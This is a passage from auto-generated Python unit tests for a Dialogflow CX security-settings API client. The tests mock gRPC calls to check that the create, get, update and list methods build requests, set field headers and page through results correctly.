credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_create_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
retention_window_days=2271,
)
response = client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_create_security_settings_from_dict():
test_create_security_settings(request_type=dict)
def test_create_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
client.create_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_create_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
))
response = await client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_create_security_settings_async_from_dict():
await test_create_security_settings_async(request_type=dict)
def test_create_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.CreateSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
call.return_value = gcdc_security_settings.SecuritySettings()
client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_create_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.CreateSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
await client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_security_settings(
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
def test_create_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_security_settings(
gcdc_security_settings.CreateSecuritySettingsRequest(),
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
@pytest.mark.asyncio
async def test_create_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_security_settings(
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
@pytest.mark.asyncio
async def test_create_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_security_settings(
gcdc_security_settings.CreateSecuritySettingsRequest(),
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
def test_get_security_settings(transport: str = 'grpc', request_type=security_settings.GetSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
retention_window_days=2271,
)
response = client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.GetSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_get_security_settings_from_dict():
test_get_security_settings(request_type=dict)
def test_get_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
client.get_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.GetSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_get_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.GetSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
))
response = await client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.GetSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_get_security_settings_async_from_dict():
await test_get_security_settings_async(request_type=dict)
def test_get_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.GetSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
call.return_value = security_settings.SecuritySettings()
client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.GetSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
await client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.SecuritySettings()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_security_settings(
security_settings.GetSecuritySettingsRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.SecuritySettings()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_security_settings(
security_settings.GetSecuritySettingsRequest(),
name='name_value',
)
def test_update_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
retention_window_days=2271,
)
response = client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_update_security_settings_from_dict():
test_update_security_settings(request_type=dict)
def test_update_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
client.update_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_update_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
))
response = await client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_update_security_settings_async_from_dict():
await test_update_security_settings_async(request_type=dict)
def test_update_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.UpdateSecuritySettingsRequest()
request.security_settings.name = 'security_settings.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
call.return_value = gcdc_security_settings.SecuritySettings()
client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'security_settings.name=security_settings.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.UpdateSecuritySettingsRequest()
request.security_settings.name = 'security_settings.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
await client.update_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'security_settings.name=security_settings.name/value',
) in kw['metadata']
def test_update_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_security_settings(
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
def test_update_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_security_settings(
gcdc_security_settings.UpdateSecuritySettingsRequest(),
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
@pytest.mark.asyncio
async def test_update_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_security_settings(
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_security_settings(
gcdc_security_settings.UpdateSecuritySettingsRequest(),
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
def test_list_security_settings(transport: str = 'grpc', request_type=security_settings.ListSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.ListSecuritySettingsResponse(
next_page_token='next_page_token_value',
)
response = client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.ListSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListSecuritySettingsPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_security_settings_from_dict():
test_list_security_settings(request_type=dict)
def test_list_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
client.list_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.ListSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_list_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.ListSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse(
next_page_token='next_page_token_value',
))
response = await client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.ListSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListSecuritySettingsAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_security_settings_async_from_dict():
await test_list_security_settings_async(request_type=dict)
def test_list_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.ListSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
call.return_value = security_settings.ListSecuritySettingsResponse()
client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.ListSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
await client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.ListSecuritySettingsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_security_settings(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_security_settings(
security_settings.ListSecuritySettingsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.ListSecuritySettingsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_security_settings(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_security_settings(
security_settings.ListSecuritySettingsRequest(),
parent='parent_value',
)
def test_list_security_settings_pager():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
